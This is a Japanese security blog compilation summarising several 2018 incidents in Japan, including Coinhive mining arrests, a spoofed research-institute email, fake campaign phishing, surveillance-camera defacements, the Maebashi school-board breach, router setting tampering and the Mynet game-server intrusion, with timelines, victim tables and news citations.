仮想通貨マイニングツール事案をまとめてみた

2018年6月14日、警察庁仮想通貨マイニングするツール(Coinhive等)を利用者に無断で設置していたとして、16人を逮捕・書類送検したと発表しました。ここでは関連情報をまとめます。

仮想通貨マイニングツール設置を対象とした国内初の事案

事案概要
捜査を担当した警察本部

当該事案により報じられた被害状況

逮捕・送検事案の一覧

2018年6月に逮捕・書類送検が具体的に報じられていたた事案は以下です。

No警察の対応担当対象容疑認否
1逮捕5県警合同捜査本部神奈川県平塚市 男性31歳 ウェブサイト運営業不正指令電磁的記録保管・同供用一部否認
2逮捕5県警合同捜査本部三重県いなべ市 男性37歳 会社役員不正指令電磁的記録保管・同供用一部否認
3逮捕宮城県警察兵庫県尼崎市 男性24歳 無職不正指令電磁的記録作成・同供用一部否認公判中)
4書類送検宮城県警察東京都新宿区 男性24歳 IT会社役員不正指令電磁的記録保管容疑を認めている
5書類送検愛知県警察京都府京都市北区 男性23歳 アダルトサイト運営社長不正指令電磁的記録保管容疑を認めている
6書類送検神奈川県警察男性30歳 ウェブデザイナー不正指令電磁的記録作成・同供用否認(正式裁判へ移行)
7書類送検千葉県警察神奈川県川崎市 男性30歳 会社員不正指令電磁的記録作成・同供用容疑を認めている
8書類送検滋賀県警察東京都三鷹市 男性24歳 大学生不正指令電磁的記録保管容疑を認めている
9書類送検埼玉県警察茨城県守谷市 男性43歳 無職不正指令電磁的記録保管など不明
10書類送検埼玉県警察広島県広島市 男性48歳 会社員不正指令電磁的記録保管など不明
11書類送検福岡県警察和歌山県和歌山市 男性40歳 インタ―ネット関連会社社長不正指令電磁的記録供用など不明
12書類送検不明男性18歳不明不明
13書類送検不明男性20代不明不明
14書類送検不明男性20代不明不明
15書類送検不明男性20代不明不明
16書類送検不明男性40代不明不明
17書類送検栃木県警察不明不明不明

摘発されたサイトの設置や収益の状況

対象事案マイニングツール設置先設置期間得た収益負荷設定
京都市北区男性23歳の事案アダルトサイト2017年9月〜2018年3月約900円(0.05XMR、当時レート) *8不明
神奈川県平塚市男性31歳
または三重県いなべ市男性37歳
web制作ナビ2017年10月中旬〜2018年2月上旬約120,000円?
収益は全額WFPへ寄付。
CPU使用率30%程度
神奈川県平塚市男性31歳
または三重県いなべ市男性37歳
やさしい確定申告 *92017年10月中旬〜2018年2月上旬約50,000円?不明
男性30歳doocts2017年9月下旬〜2017年11月上旬(約1か月超)約900円使用感を阻害しない、不自然にCPUが回らない設定
神奈川県川崎市男性30歳アイドル関連サイト不明不明不明
東京都三鷹市男性24歳運営サイト不明数百円不明
和歌山県和歌山市男性40歳運営サイト2017年12月〜2018年4月不明不明
兵庫県尼崎市男性24歳アダルトサイト2017年9月〜2018年2月数円から約200円不明
東京都新宿区男性24歳オンラインゲーム支援を偽装したプログラム*102017年9月〜2018年2月数円から約200円不明

ウェブデザイナー男性の事案 正式裁判の動き

当該事案に関連する動き

警察による摘発対象の判断

警察庁の注意喚起

自身が運営するウェブサイトに設置する場合であっても、マイニングツールを設置していることを閲覧者に対して明示せずにマイニングツールを設置した場合、犯罪になる可能性があります。

各県警察もその後注意喚起を公開している。

注意喚起内容、及び事案化された情報から摘発対象の条件を整理すると次の通り。

マイニングツール設置者自分が意図的に設置していた場合も対象
利用者への通知ツール設置に係る明示*13が行われていない
マイニングツールの負荷程度によらず何らかの負荷が発生する
収益の有無金額によらない(数円程度でも対象)
報道等で取り上げられている警察側のコメント
今回の事案に対するブログ・コメント等

その他関連情報

福岡県警察の事案関連とみられるツイート
Coinhive/Cryptojackingを取り上げた調査・検証記事等
収益等に関する参考情報
記事ツール設置期間収益
【謝罪】皆様が利用している間に、コインマイニングしていた話【Coinhive】不明(1時間?)0.00015 XMR
コインハイブ採掘「悪いことなの?」 サイト運営者語る約2か月半1万円相当のモネ
仮想通貨を採掘させるCoinhiveで逮捕・書類送検された人たちについてまとめた2017年12月〜2018年6月0.01239 XMR (2018/6/16時点)

更新履歴

*1他人PCで仮想通貨「採掘」=サイト閲覧者に無断で−16人を初摘発・警察当局,時事通信,2018年6月14日

*2違法マイニングで16人摘発 10県警、仮想通貨獲得巡り,共同通信,2018年6月14日

*3アイドル関連HPにウイルス 無断で仮想通貨を採掘 30歳男性を書類送検 千葉県警,産経ニュース,2018年6月14日

*4他人のPCを遠隔操作し仮想通貨,NHK,2018年6月14日

*5<仮想通貨>監視プログラム「マイニング」悪用 3人逮捕、1人書類送検 宮城県警、全国初,河北新報,2018年6月15日

*6仮想通貨発掘 県警、さらに1人捜査 「コインハイブ」設置事件で /栃木,毎日新聞,2018年6月15日

*7読売新聞,2018年6月15日朝刊

*8他人のPC仮想通貨獲得に利用か,NHK,2018年6月15日

*9https://urlquery.net/report/5fa27210-d635-44c0-bcb9-2ac2783bba78

*10他人のPCを遠隔操作し仮想通貨,NHK,2018年6月14日

*11仮想通貨 他人PCで採掘,朝日新聞,2018年6月15日朝刊

*12仮想通貨「マイニング」PC無断使用 国内初の立件,毎日新聞,2018年6月14日

*13ウェブデザイナー男性の事案ではCoinhive設置同日に検証主旨の記事を公開していたとされ、明示手段の詳細は不明。

*14https://twitter.com/Khrome00/status/1007829339990179840

*15https://twitter.com/Khrome00/status/1007020186958901248

*16https://twitter.com/Khrome00/status/1007737861821460481

*17https://twitter.com/Khrome00/status/1007837967186948096

2018年2月のデータリークに関連する国内サイトの被害についてまとめてみた

2018年2月にインターネット上でメールアドレスなどを含む大量の情報が公開されていると報じられました。

リークされた情報には日本国内も含まれていたとみられ、その後この件との関連が疑われる発表が複数のWebサイトで行われています。ここでは関連する情報をまとめます。

約3,000のデータベースリーク

取り上げられたリークの概要は以下の通り。

Troy Hunt氏の分析

Troy Hunt: I’ve Just Added 2,844 New Data Breaches With 80M Records To Have I Been Pwned

Troy Hunt氏がそのデータを分析したところ、

メールアドレス80,11,532件
ファイル2,844個

これらのデータはどこにリークされていたのか

f:id:Kango:20180608114357p:image:w450 f:id:Kango:20180609101121p:image:w450

このリークを取り上げる国内の動き

2社がこの情報に関連する動きを見せており、それに合わせて報道が出ている。

KELA
ソリトンシステムズ

関連タイムライン

関連する動きをまとめると以下の通り。

日時出来事
2018年2月19日ハッキングフォーラム上でこの件に関連する投稿が行われてた。(Troy Hunt氏確認による)
2018年2月22日がん治療認定医の所属先から日本がん治療認定医機構へ情報流出の情報提供
2018年2月23日Haeked-DBのリークデータ発見を報じるHackReadの記事が公開された。
2018年2月26日Troy Hunt氏がこの件を取り上げた分析記事を公開した。
2018年2月28日兵庫県警察尼崎市へ情報流出の可能性があると情報提供
2018年2月28日兵庫県警察宝塚山本ガーデンクリエイティブ株式会社へ情報流出の可能性があると情報提供
2018年3月9日尼崎市不正アクセス被害を発表。
2018年3月22日日本がん治療認定医機構が登録情報の流出を発表。
2018年3月23日兵庫県警察宝塚山本ガーデンクリエイティブ株式会社へ情報流出の可能性があると情報提供
2018年4月2日冨美家が京都県警から情報提供を受け会員情報の流出を把握。
2018年4月3日国内で中央省庁職員アドレス流出の報道。NISCが各省庁に対して注意喚起。
2018年4月6日日経xTechが三菱地所・サイモンへ情報流出の可能性があると情報提供
2018年4月14日三菱地所・サイモンが会員情報の流出を発表。
2018年4月27日宝塚市宝塚山本ガーデンクリエイティブ株式会社不正アクセス被害を発表。
2018年5月8日ソリトンシステムズがこの件を含む大量のデータを確認したと発表。
ビープラッツ株式会社が情報流出の被害を把握。
2018年5月10日ビープラッツ株式会社不正アクセス被害を発表。

関連が疑われる国内事例

Troy hunt氏が公開したPastebin上で、.jp/.jp.comのドメインが含まれるファイル名は全部で84件存在する。

また2018年6月8日現在、以下の5つのサイト*2において、情報漏洩の被害が発表されている。

以下は各事案の個別まとめです。(後日詳細を追加します。)

尼崎市2018年3月9日発表)

被害を受けたWebサイト健診すずめ通信(閉鎖中)

日本がん治療認定医機構(2018年3月22日発表)

被害を受けたWebサイト変更届システム(閉鎖中)

冨美家(2018年4月5日発表)

被害を受けたWebサイト冨美家オンラインショップ

三菱地所・サイモン2018年4月14日発表)

被害を受けたWebサイトプレミアム・アウトレット ショッパークラブ(臨時サイト)

宝塚山本ガーデン・クリエイティブ株式会社2018年4月27日発表)

被害を受けたWebサイトあいあいパーク

ビープラッツ株式会社2018年5月10日発表)

被害を受けたWebサイト:licensestore.jp(過去に運営されていたサイト)

更新履歴

*1中央省庁の職員2千人分の公用メアド流出 ネットで売買,朝日新聞,2018年4月3日報道

*2:ビープラッツはPastebinで確認できなかった

日本経済研究所のなりすましメールについてまとめてみた

2018年5月31日、日本政策投資銀行がグループ会社の日本経済研究所になりすました不審なメールが確認されたとして注意喚起を行いました。ここでは関連する情報についてまとめます。

日本政策投資銀行の注意喚起

当行グループ会社である株式会社日本経済研究所の職員を詐称してマルウェア・ウイルス等が添付ファイルで送りつけられるケースが発生しております。

 発信元や内容に心当たりのないメールを受信された場合は、ウイルス感染や不正アクセスなどの危険がありますので、添付ファイルを開かずに、また、メール本文中のリンク先URLをクリックせずに、メールごと削除していただくようお願いいたします。

日本経済研究所のなりすましメール

調べてみたところ、2018年5月末に日本経済研究所の名前を使って次のメールが送信されていることを確認しました。

なりすましメールの情報を整理すると次の通りです。

確認したメール受信日2018年5月30日(水)9時頃
差出人名有り
FROMアドレス **********@jeri.co.jp
件名中国投資概況更新
本文**様


大変お世話になっております。

株式会社日本経済研究所の**と申します。

突然のご連絡で恐れ入りますが、本日は、弊社の親会社中国の投資概況資料につき、更新しましたので、別添にてご案内致します。

(パスワードは弊社小文字4文字です。)

また、ご不明な点などございましたら、ご連絡くださいませ。

以上、よろしくお願いいたします。



**

***********************************************

? 日本経済研究所 国際本部 国際第二部

** **

TEL:(03)6214-**** FAX:(03)6214-****

E-mail:**********@jeri.co.jp

〒100-0004 千代田区大手町1-9-2

大手町フィナンシャルシティ グランキューブ15階

***********************************************
添付ファイル有り(中国_投資概況.zip

添付ファイル「中国_投資概況.zip

f:id:Kango:20180601034616p:image:w450

f:id:Kango:20180601044728p:image

f:id:Kango:20180601043330p:image

インディケーター情報

以下はこのまとめにて確認した情報です。

ファイル
ファイル名sha256
中国_投資概況.zipa9aff652f8ab62678bf45ead7d0efb43c6a4a28bca63ee7fdfbdcdccb476d3a
中国投資概況.ppsxe4777d7dadb49367533db031f32afd35e44642ac58260dfbcf847875bc22a333
common_img10.png89caf357f870ce68018601d434520a9b2d615f8123fb11d687235d10b267b69c
MSO1024.acl337d610ebcc9c0834124f3215e0fe3da6d7efe5b14fa4d829d5fc698deca227d
通信

IPアドレス2018年6月1日時点のものです。

更新履歴

国内組織のキャンペーンやアンケートに偽装したなりすましメールについてまとめてみた

2018年4月、5月と国内の複数の企業がなりすましメールに対する注意喚起を公開しています。キャンペーンやアンケートなどを行っているように偽装し、個人情報の入力が求められるサイトへ誘導される、あるいはメール送るよう要求するというものです。ここでは関連する情報をまとめます。

確認した注意喚起

piyokangoが2018年に確認した注意喚起30件
発信日付注意喚起元内容手口
2018年2月5日日経リサーチ日経リサーチの社名を騙った悪質メールにご注意ください。何らかのサイトへ誘導
2018年2月14日日本航空弊社および弊社グループ会社名を使用した不審なFacebook投稿にご注意ください不明
2018年2月21日マイナビマイナビ researchをかたった悪質なメールにご注意ください何らかのサイトへ誘導
2018年3月13日あきんどスシロー当社を装った不審なメールにご注意ください。不明
2018年4月2日日本郵便当社を装った「フィッシングサイト」にご注意ください。個人情報を入力するサイトへ誘導
2018年4月26日三越伊勢丹弊社をかたる詐欺メールにご注意ください個人情報をメールで要求
2018年4月27日オートバックス[PDF] オートバックスからの『「ご意見」・「ご指摘」のお願い』を騙るなりすましメールにご注意ください不明
2018年4月28日
(5月10日更新)
サントリーホールディング『ザ・プレミアム・モルツ』を用いて 個人情報の提供を求めるキャンペーンにご注意ください個人情報をメールで要求
会場への来場依頼
2018年5月1日吉野家当社名を騙る不審なメールにご注意ください個人情報をメールで要求
2018年5月6日カゴメ不審なメール・SMSにご注意ください個人情報をメールで要求
2018年5月7日伊藤園伊藤園を装ったキャンペーン当選案内にご注意ください。個人情報をメールで要求
2018年5月8日クラシアン【注意】クラシアンを装った不審なメールにご注意ください個人情報をメールで要求
2018年5月10日森永乳業個人情報の提供を求めるキャンペーンにご注意ください個人情報をメールで要求
2018年5月10日ユニリーバ・ジャパン・カスタマーマーケティング個人情報の提供を求める偽キャンペーンにご注意ください個人情報をメールで要求
2018年5月11日キリン、キリンビール『本搾り(TM)チューハイ』の当選を装い個人情報の提供を求める、不審なメールにご注意ください個人情報をメールで要求
2018年5月14日山崎製パン[PDF]「春のパンまつり」に応募して個人情報の提供を求める不審なメールにご注意ください個人情報をメールで要求
2018年5月15日西友【注意喚起】SEIYUを装った迷惑メールにご注意ください個人情報をメールで要求
2018年5月16日マルハニチロ[PDF] 個人情報の提供を求める不審なメールにご注意ください個人情報をメールで要求
2018年5月18日アサヒビールアサヒスーパードライのキャンペーン当選を装い個人情報の提供を求める不審なメールにご注意ください。個人情報をメールで要求
2018年5月21日ヤマエ久野【重要なお知らせ】注意喚起。「焼酎紀行」の名を語った成りすましメールにご注意ください個人情報をメールで要求
2018年5月22日ゴールドパック弊社社名を装ったスパムメールにご注意ください。個人情報をメールで要求
2018年5月28日キリン、キリンビールキリン商品のキャンペーン等を装い個人情報の提供を求める、不審なメールにご注意ください個人情報をメールで要求
2018年5月28日ユーコープ【注意喚起】”co-op配送サービスお客様担当”を名乗ったメールにご注意ください。個人情報をメールで要求
2018年5月29日?マーシュD style webを名乗る架空メールにご注意ください。個人情報をメールで要求
2018年6月ノーリツ【ご注意ください】 個人情報をメールで要求
2018年6月7日イオン[PDF] トップバリュキャンペーンを装う不審なメールについて個人情報をメールで要求
2018年6月8日大正製薬弊社キャンペーンをかたった不審なメールにご注意ください個人情報をメールで要求
2018年6月8日カカクコム大正製薬×食べログを装った不審なメールにご注意ください(2018年6月8日)個人情報をメールで要求
2018年6月8日ポーラ[PDF] ポーラ(POLA)を装った不審なメールにご注意ください個人情報をメールで要求
2018年6月12日花畑牧場弊社社名と類似名称を使用したメールにご注意お願いいたします。個人情報をメールで要求
2018年6月13日モバレンモバレンを装った迷惑メールについて個人情報をメールで要求

また、2017年も似たような手口の注意喚起が行われており、piyokangoが確認したものは次の通り。

発信日付注意喚起元内容手口
2017年1月24日レインズインターナショナル[PDF]【注意喚起】牛角を装ったスクラッチキャンペーン広告にご注意ください空メールの送信を要求
2017年4月17日伊藤園「TULLY’S COFFEE」主催を装ったキャンペーンにご注意ください。LINEアカウントの登録要求
2017年8月10日TBSご注意ください TBSを名乗るメールに関して不明
2017年8月30日日経リサーチ日経リサーチの社名を騙った悪質メールにご注意ください。何らかのサイトへ誘導
2017年11月9日日経リサーチ日経リサーチの社名を騙った悪質メールにご注意ください。何らかのサイトへ誘導
2017年12月25日日経リサーチ日経リサーチの社名を騙った悪質メールにご注意ください。何らかのサイトへ誘導

確認されている手口

次の内容をダイレクトメールやショートメールで送り付け、個人情報などが求められる。

確認した事例では次の(いずれかの)情報が要求されている。

なりすましメールを受信したというツイート

マイナビ

三越伊勢丹

オートバックス

サントリーホールディグ


伊藤園

カゴメ

クラシアン

森永乳業、ユニリーバ・ジャパン・カスタマーマーケティング

キリン、キリンビール

山崎製パン

西友

マルハニチロ

アサヒビール

ラッキーディップになりすまして送信している可能性。

ゴールドパック

ヤマエ久野

文化堂

大正製薬

更新履歴

監視カメラへの不正アクセスについて調べてみた

2018年4月下旬、八千代市や上尾市は市内で運用している監視カメラが不正アクセスを受けたと発表しました。ここでは関連情報をもとに調べた内容をまとめます。

被害事例

八千代市
上尾市
東京電力、新エネルギー・産業技術総合開発機構
広島市西区 魚市場
神戸市東灘区 障碍者施設
埼玉県企業 那覇支店

不正アクセスの手口

報道などで確認されている手口は次のもの。

キヤノンのネットワークカメラで同様の改ざん事例を複数確認

被害を受けた機種件数
VB-M741LE4件
VB-M620VE4件
VB-S805D4件
VB-M404件
VB-M720F4件
VB-S905F4件
VB-M423件
VB-M6003件
VB-R10VE8件
VB-S31D2件
VB-S30D3件
VB-S900F1件
VB-M740E1件
VB-C5001件
VB-M7001件
不明15件

この件との関連は明らかではないが、4月26日にキヤノンが不正アクセス防止策として、注意情報を公開した。

外部からの不正アクセス対策のポイント

1. プライベート IP アドレスで運用する

2. ファイアウォールで通信を制限する

3. ネットワークカメラをパスワードで管理する

4. SSL 暗号化通信を設定する

http://cweb.canon.jp/pdf-catalog/webview/pdf/nwc-security.pdf

報道後に出された他メーカーの注意喚起

プラネックスコミュニケーションズ
ソリッドカメラ

埋め込まれたメッセージに「marumiedesu.」

埋め込まれたメッセージ観測した件数
I'm Hacked. bye250件
FUCK POLICE6件
FUCK GOVERNMENT5件
marumiedesu. 1件

f:id:Kango:20180429022002p:image

f:id:Kango:20180429020849p:image

f:id:Kango:20180429020846p:image

f:id:Kango:20180429020830p:image

更新履歴

*1監視カメラに不正アクセス,Reuters,2018年5月14日アクセス

*2東電カメラも不正アクセス被害 銚子沖の洋上風力監視用,千葉日報,2018年5月14日アクセス

前橋市教育委員会への不正アクセスについてまとめてみた

2018年4月4日、前橋市教育委員会は前橋市教育情報ネットワーク(MENET)が不正アクセスを受け、校務用サーバーから児童生徒の個人情報等が漏えいした可能性があると発表しました。ここでは関連情報をまとめます。

公式発表

インシデントタイムライン

日時出来事
2017年8月中旬から公開サーバーに対し3000回以上の不正アクセスが発生。
2018年3月6日何者かが校務用サーバーへ不正アクセス
2018年3月16日前橋市教育委員会職員不正アクセス痕跡を覚知。
2018年3月28日前橋市教育委員会が不正アクセスが確認され調査中と発表。
2018年3月30日委託先の調査会社より情報漏えいの可能性があると前橋市教育委員会へ報告。
2018年4月4日前橋市教育委員会が不正アクセスによる情報漏えいがあったと記者会見し発表。
2018年4月12日前橋市市長が定例記者会見で情報漏えいの可能性について陳謝。
2018年4月16日第三者調査委員会第1回目会合が開催。
2018年4月18日調査会社から前橋市へ調査結果が報告。
2018年4月19日前橋市教育委員会が漏えいした可能性のある個人情報が新たに追加されたと発表。
2018年5月上旬NTT東日本 群馬支店が前橋市教育委員会へ設定不備などを報告。*1
2018年5月21日前橋市 市議会教育福祉常任員会でNTT東日本から受けた報告を発表。

被害状況

概要を整理すると次の通り。

f:id:Kango:20180405032747p:image

被害の詳細
対象件数漏えいした恐れのある項目
平成24年度から平成29年度前橋市立小中特別支援学校在籍の
児童・生徒の個人情報
25,725件
⇒47,839件に変更
・学年
・組
・出席番号
・氏名
・性別
・生年月日
・国籍
・住所
・電話番号
・保護者氏名
・アレルギー
・既往症
平成24年度から平成29年度の間に前橋市立公立学校(園)で給食喫食していた
園児児童生徒及び教職員の口座情報
19,932件
⇒28,209件に変更
・銀行名
・支店名
・口座番号
・名義人氏名
2018年4月4日発表件数25,725人⇒25,226人に訂正
2018年4月19日新規追加件数22,613人
合計47,839人
過去8か月間での不正アクセス被害

発端

不正アクセスの手口

原因

対応

第三者調査委員会

次のメンバーより構成される。*15

小暮俊子氏弁護士(調査委員会 委員長)
横山重俊氏群馬大総合情報メディアセンター教授
青嶋信仁氏株式会社DIT セキュリティサービス事業部 事業部長

(参考)MENET関連情報

職員系ネットワーク主に業務(校務)での利用を目的としたネットワークで,利用者は教職員のみとする。各学校園で,校長室,職員室,保健室,事務室等に敷設された有線ネットワーク。
児童生徒系ネットワーク主に授業での利用を目的としたネットワークで,利用者は児童生徒及び教職員とする。教室,特別教室,体育館等に敷設された有線及び無線ネットワーク。尚,災害時の避難場所として学校を提供する場合は,一時的に地域住民も利用することができる。
データセンター校務系サーバー、授業系サーバー、認証・管理系サーバーなど設置。インターネットにも接続。

新聞報道

新聞社日付見出し
読売新聞2018年4月5日朝刊児童ら2万5000人情報流出 前橋 市教委に不正アクセス
朝日新聞2018年4月5日朝刊小中学生2.5万人 個人情報流出か 前橋 不正アクセス
毎日新聞2018年4月5日朝刊児童生徒2万人 個人情報流出か 前橋・不正アクセス
東京新聞2018年4月5日朝刊児童ら個人情報流出か 前橋市教委 小中学校2万5000人分
日本経済新聞2018年4月5日朝刊個人情報4万件流出か前橋市教委
産経新聞2018年4月5日朝刊児童・生徒情報 4.5万件流出か 前橋市教委、サーバー更新怠る

更新履歴

*1NTTのファイアウォール設定に不備? 前橋市教委不正アクセス,上毛新聞,2018年5月22日アクセス

*2前橋市教委サーバー 不正アクセスは8か月間に3000回以上,NHK,2018年4月6日アクセス

*3不正アクセス 3000件 昨年8月、前橋市教委に /群馬,毎日新聞年4月8日アクセス

*4前橋市教委のネットワークに /群馬,毎日新聞,2018年4月5日アクセス

*5前橋市教委 不正アクセス 2万人超の個人情報流出,毎日新聞,2018年4月5日アクセス

*6不正アクセス 小中学生の個人情報流出か(群馬県),NNN,2018年4月5日アクセス

*7前橋市教委サーバー 昨夏、外部から3000回超攻撃 先月、情報流出か,産経ニュース,4月6日アクセス

*8個人情報4万5千件流出か 前橋市教委、児童名など ,日本経済新聞,2018年4月5日アクセス

*9前橋市の個人情報流出問題 内部規則、十分順守せず,東京新聞,2018年4月10日アクセス

*10小中学生ら個人情報流出か=2万5000人分−前橋市教委,時事通信,2018年4月5日アクセス

*11前橋市教委サーバー不正アクセス ずさんな情報管理浮き彫り,産経ニュース,2018年4月5日アクセス

*12前橋市の情報流出問題 山本市長が会見で陳謝「大変な不安与えた」,東京新聞,2018年4月13日アクセス

*13前橋の個人情報流出問題 NTT、一部不備認める,東京新聞,2018年5月22日アクセス

*14個人情報流出で第三者委 初会合で委員委嘱 前橋市教委,上毛新聞,2018年4月17日アクセス

*15不正アクセス問題 前橋市教委、第三者委議事録作成せず 「丸投げいいのか」指摘も /群馬,毎日新聞,2018年4月17日アクセス

*16: [PDF] MENETにおいて扱う情報の保護に関する規則

ルーターの設定情報改ざんについてまとめてみた

2018年2月末頃から何者かによるルーター内の設定情報が書き換えられる被害が報告されています。改ざんによりインターネットへ接続できなくなったり、マルウェア配布サイトへ誘導されたりする事象が発生し、日本国内でも3月半ばぐらいから同様の事象が報告があがっています。

ここでは関連情報をまとめます。

確認されている被害事象

(1) ルーターの設定情報が改ざんされる
(2) マルウェア配布サイトへ誘導される
確認時期表示されるメッセージの例ダウンロードされるファイル名
2018年3月半ばFacebook拡張ツールバッグを取付て安全性及び使用流暢性を向上します。facebook.apk
2018年3月下旬閲覧効果を良く体験するために、最新chromeバージョンへ更新してください。chrome.apk

改ざん被害が報告されているルーター

Logitecのルーター対象機種(報告が上がっているもの)
Buffaloのルーター対象機種(報告が上がっているもの)
NTT東日本・NTT西日本のルーター対象機種
Kasperskyの観測情報

改ざんされる原因

(1)本機器をインターネット接続用途で利用している場合。

(2)インターネット接続設定でセキュリティ設定を無効にして利用している場合。

(3)機器設定用ログインパスワードを初期値より変更していない場合。

ロジテック製ルーターをお使いのお客様で本事象が発生している場合は、ご利用機器の設定を変更いただくことで解消いたします。

設定の変更方法については、下記の窓口にお問い合わせください。

改ざん被害を受けた場合

報告事例・報道など(関連が疑われるもの含む)

韓国
日本

新聞報道

新聞社日付見出し
朝日新聞2018年3月27日朝刊ルーターにサイバー攻撃か NTTの法人向け機器
読売新聞2018年3月31日夕刊ルーター設定 無断変更 被害相次ぐ スマホ情報抜き取り
朝日新聞2018年4月6日朝刊ルーター被害 NTT以外も サイバー攻撃 PC・スマホ接続不可に
日本経済新聞2018年4月6日夕刊サイバー攻撃 ルーター狙う 個人情報盗む目的か

更新履歴

*1https://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q11187751811

*2ルーターにサイバー攻撃、NTT以外も ネット使えず,朝日新聞,2018年4月6日アクセス

*3https://twitter.com/mikenekoyuzu/status/976593490489430017

*4http://blog.maxx.co.jp/?eid=362

*5https://productforums.google.com/forum/#!msg/chrome-ja/coU655lLpRA/RYCCYYMJCQAJ

マイネットへの不正アクセスについてまとめてみた

2018年3月1日頃、マイネットグループの株式会社マイティゲームスのサーバーに対し不正アクセスが行われ、運営する複数のゲームサービスでシステム障害が発生しました。

ここでは関連情報をまとめます。

公式発表

(公式発表の一部は更新が適宜行われているため、最初に公開された日付を記載しています。)

インシデントタイムライン

日付出来事
2018年3月1日 11時頃何者かがマイネットの内部ネットワークへ侵入し、サーバーへ不正アクセス
サーバー上のデータ削除スクリプトを実行。(1回目の不正アクセス
〃 11時40分マイネットシステム部門の担当者がサーバーから発出されたアラートを検知。
また同タイミングにて複数サービスにてシステム障害の発生を確認。
〃 12時頃マイネットのゲームサービス13個でシステム障害が発生。
〃 13時00分頃影響が確認されたサービスを緊急メンテナンスへ順次移行を開始。
〃 13時10分頃障害発生が確認されたサーバーが稼動している都内データセンターで調査を開始
〃 14時00分頃都内データセンター内のサーバーで異常が無いことを確認。
〃 19時00分頃不正アクセスに利用されたと見られるサーバーの特権IDでサーバーのデータを削除するスクリプトを発見。
サーバーのログインパスワードの変更を実施。
〃 19時30分頃サービス影響が確認されていないタイトルから順次再開
2018年3月2日 1時頃までマイネットが影響が出たタイトル7つを再開。
〃 3時30分頃までマイネットが影響が出たタイトル2つを再開。(合計9個が再開。)
2018年3月3日 0時頃マイネットが影響が出た残りのタイトルを再開。(合計12個が再開。)
〃 17時30分頃何者かがVPN経由でマイネットのサーバーへ不正アクセス。データ削除コマンドを実行。(2回目の不正アクセス)
〃 17時40分頃マイネットのサービス担当者がサーバーのデータベースが消失していることを確認。
〃 19時頃マイネットが複数のサービスにて不具合の発生を確認。
〃 同じ頃調査の結果、同一IPアドレスから複数アカウントでVPN へのアクセスおよびサーバーへのログインが確認された。
対象のVPNアカウント及びVPN自体を全て停止。
〃 19時30分頃マイネットが当該事案が不正アクセスの可能性が高いと判断。
不正アクセスされたサーバーと類似環境にて運営中のサービス停止を決定。
〃 同じ頃緊急対策チームの組成を実施。初動対応に着手。
2018年3月4日 1時頃マイネットが3日18時頃から複数タイトルで障害が発生していると発表。
〃 21時45分マイネットが警察へ通報。
2018年3月7日以降マイネットがサービスの再開作業を開始。
2018年3月15日 15時00分頃マイネットがサービス3つを再開。
2018年3月16日 12時30分頃マイネットがサービス1つを再開。
2018年3月19日 12時00分頃マイネットがサービス2つを再開。
2018年3月19日 15時00分頃マイネットがサービス1つを再開。
2018年3月20日 17時00分頃マイネットがサービス2つを再開。
2018年3月20日 19時00分頃マイネットがサービス2つを再開。
2018年3月22日 12時00分頃マイネットがサービス1つを再開。
2018年3月22日 15時00分頃マイネットがサービス1つを再開。
2018年3月26日マイネットが同社サービスへの不正アクセスの中間調査報告書を公開。
2018年3月28日 16時00分頃マイネットがサービス1つを再開。
2018年4月17日マイネットが最新の障害対応状況を報告。
2018年4月17日 15時00分頃マイネットがサービス1つを再開。
2018年4月18日マイネットが最新の障害対応状況を報告。
2018年4月18日 15時00分頃マイネットがサービス1つを再開。
2018年4月20日 12時00分頃マイネットがサービス1つを再開。
2018年4月20日 15時00分頃マイネットがサービス1つを再開。
2018年5月2日 15時30分頃マイネットがサービス1つを再開。
2018年5月11日マイネットが最終報告書を公開。
2018年6月7日 15時00分頃マイネットがサービス1つを再開。(合計14個が再開。)

被害の状況

不正アクセスの概要

f:id:Kango:20180327034512p:image

システム障害が発生したサービス
Noタイトル名稼働環境稼働状況
1天下統一オンラインMobage3月15日15時頃再開
2GREE3月15日15時頃再開
3dゲーム3月22日15時頃再開
4タイトル(タイトル名非公開)<海外地域>不明3月15日15時頃再開
5〃 <国内地域>不明3月28日16時頃再開
6熱血硬派くにおバトルMobage3月16日12時30分頃再開
7HUNTER×HUNTER バトルコレクション<ForGroove 提供>Mobage3月19日12時頃再開
8Ameba4月20日15時頃再開
9dゲーム4月20日15時頃再開
10HUNTER×HUNTER アドバンスコレクション<ForGroove 提供>Yahoo!モバゲー3月19日12時頃再開
11HUNTER×HUNTER トリプルスターコレクション<ForGroove 提供>GREE3月22日12時頃再開
12究極×進化!戦国ブレイクYahoo!モバゲー3月19日15時頃再開
13ラグナブレイク・サーガYahoo!モバゲー3月20日17時頃再開
14DMM GAMES3月20日17時頃再開
15アヴァロン ΩAndroid3月20日19時頃再開
16iOS3月20日19時頃再開
17アヴァロンの騎士dゲーム4月26日15時頃再開
18GREE4月26日15時頃再開
19Mobage5月2日15時30分頃再開
20神魔×継承!ラグナブレイクAmeba6月7日15時頃再開
21dゲーム3月23日16時時点で停止中
22GREE6月7日15時頃再開
23mixi3月23日16時時点で停止中
24Mobage4月17日15時頃再開
25ファイナルファンタジー グランドマスターズ<スクウェア・エニックス提供>Android4月20日12時頃再開
26iOS4月20日12時頃再開
27ミリオンアーサー エクスタシスdゲーム4月18日15時頃再開
28GREE4月18日15時頃再開
29Mobage4月18日15時頃再開
30コロプラ4月18日15時頃再開
マイネットのサービス再開基準
その他関連する情報

マイネットのサーバーが不正アクセスを受けた原因

窃取されたとみられるクレデンシャル盗んだ方法
ビジネスチャットツール(5アカウント)中間報告の段階では判明せず
VPNアカウント運用担当者間でビジネスチャット上でID、PWのやり取りが行われていた。
これが盗み見られた可能性がある。*1
グループウェアアカウント中間報告の段階では判明せず
グループ内のActive Directory中間報告の段階では判明せず
不正アクセスで確認された行為

何者かが行った不正アクセス行為は以下の通り。

2018年3月1日特権IDを用いてデータを削除するスクリプトを実行。
2018年3月3日データ削除コマンドを実行。

マイネットが行った対処内容

初動対応原因の調査
ユーザーのゲームデータの保全
開発環境の復旧
サービス再開に必要なセキュリティ対策の実施
他タイトルへの影響調査
復旧対応サービス再開に必要なセキュリティ対策
データ保全方法の強化
サーバーの復旧
一部データの復元
など
再発防止抜本的な情報セキュリティ強化対策を取るプロジェクトの立ち上げ
外部の専門アドバイザー等の再発防止への取り組み
追加で調査必要と判断した場合は、第三者による調査等の検討

更新履歴

*1「チャットから管理者IDが漏洩」、マイネットがスマホゲーム障害で公表,日経XTECH,2018年3月27日アクセス

2018年3月の内閣府のなりすましメールについてまとめてみた

